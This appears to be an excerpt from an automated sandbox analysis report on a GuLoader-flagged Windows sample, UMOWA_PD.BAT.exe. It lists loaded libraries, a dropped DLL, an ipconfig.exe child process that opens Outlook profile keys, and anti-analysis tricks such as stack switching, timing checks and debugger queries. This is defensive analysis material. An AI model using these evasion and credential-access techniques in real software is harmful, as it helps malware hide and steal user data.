        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: UMOWA_PD.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: giLTwJlyLWpfb.exe, 00000003.00000000.15312438170.000000000009E000.00000002.00000001.01000000.00000007.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19979533628.000000000009E000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: UMOWA_PD.BAT.exe, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.15206197185.0000000005014000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.15388629452.00000000017D4000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FE21BFF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE230C0 push eax; ret 0_2_6FE230EE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C908CD push ecx; mov dword ptr [esp], ecx2_2_33C908D6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_032208CD push ecx; mov dword ptr [esp], ecx4_2_032208D6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F5212 push eax; ret 4_2_030F5214
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED25C pushad ; retf 4_2_030ED276
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED26D pushad ; retf 4_2_030ED276
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E527D pushfd ; iretd 4_2_030E52A0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ED2A3 pushfd ; ret 4_2_030ED2BE
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E5101 push es; ret 4_2_030E5188
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E5160 push es; ret 4_2_030E5188
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EC825 pushfd ; retf 4_2_030EC847
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EAF0E push ebx; iretd 4_2_030EAF12
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EB7EC push es; retf 4_2_030EB811
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030ECE71 push 00000021h; ret 4_2_030ECE7B
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E66F0 pushad ; ret 4_2_030E66F1
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030E7515 push ebx; ret 4_2_030E7528
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F0D33 push FFFFFF88h; retf 4_2_030F0D3D
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030EC4CD push edx; ret 4_2_030EC4CE

        Persistence and Installation Behavior

        barindex
        Uses ipconfig to lookup or modify the Windows network settings
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeFile created: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI/Special instruction interceptor: Address: 54AEEF5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI/Special instruction interceptor: Address: 1C6EEF5
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D144
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D764
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D324
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D364
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D004
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2FF74
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF99FC2D864
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 rdtsc 2_2_33CD1763
        Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9189Jump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.5 %
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep count: 121 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep time: -242000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep count: 9189 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 7464Thread sleep time: -18378000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep time: -85000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep count: 45 > 30Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep time: -67500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep count: 48 > 30Jump to behavior
        Source: C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe TID: 7536Thread sleep time: -48000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15299601778.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: giLTwJlyLWpfb.exe, 00000005.00000002.19980948559.00000000009EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllwwz|
        Source: ipconfig.exe, 00000004.00000002.19059845738.0000000002B90000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.15684079593.000001DFD6736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4908
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4915
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 rdtsc 2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_00401774 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401774
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 0_2_6FE21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FE21BFF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C963CB mov eax, dword ptr fs:[00000030h]2_2_33C963CB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D143D5 mov eax, dword ptr fs:[00000030h]2_2_33D143D5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E3C0 mov eax, dword ptr fs:[00000030h]2_2_33C8E3C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E3C0 mov eax, dword ptr fs:[00000030h]2_2_33C8E3C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E3C0 mov eax, dword ptr fs:[00000030h]2_2_33C8E3C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C3C7 mov eax, dword ptr fs:[00000030h]2_2_33C8C3C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC33D0 mov eax, dword ptr fs:[00000030h]2_2_33CC33D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC43D0 mov ecx, dword ptr fs:[00000030h]2_2_33CC43D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91380 mov eax, dword ptr fs:[00000030h]2_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91380 mov eax, dword ptr fs:[00000030h]2_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91380 mov eax, dword ptr fs:[00000030h]2_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91380 mov eax, dword ptr fs:[00000030h]2_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91380 mov eax, dword ptr fs:[00000030h]2_2_33C91380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF380 mov eax, dword ptr fs:[00000030h]2_2_33CAF380
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F38A mov eax, dword ptr fs:[00000030h]2_2_33D4F38A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0C3B0 mov eax, dword ptr fs:[00000030h]2_2_33D0C3B0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C993A6 mov eax, dword ptr fs:[00000030h]2_2_33C993A6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C993A6 mov eax, dword ptr fs:[00000030h]2_2_33C993A6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C88347 mov eax, dword ptr fs:[00000030h]2_2_33C88347
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C88347 mov eax, dword ptr fs:[00000030h]2_2_33C88347
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C88347 mov eax, dword ptr fs:[00000030h]2_2_33C88347
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10371 mov eax, dword ptr fs:[00000030h]2_2_33D10371
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10371 mov eax, dword ptr fs:[00000030h]2_2_33D10371
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E372 mov eax, dword ptr fs:[00000030h]2_2_33D0E372
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E372 mov eax, dword ptr fs:[00000030h]2_2_33D0E372
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E372 mov eax, dword ptr fs:[00000030h]2_2_33D0E372
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E372 mov eax, dword ptr fs:[00000030h]2_2_33D0E372
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B360 mov eax, dword ptr fs:[00000030h]2_2_33C9B360
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
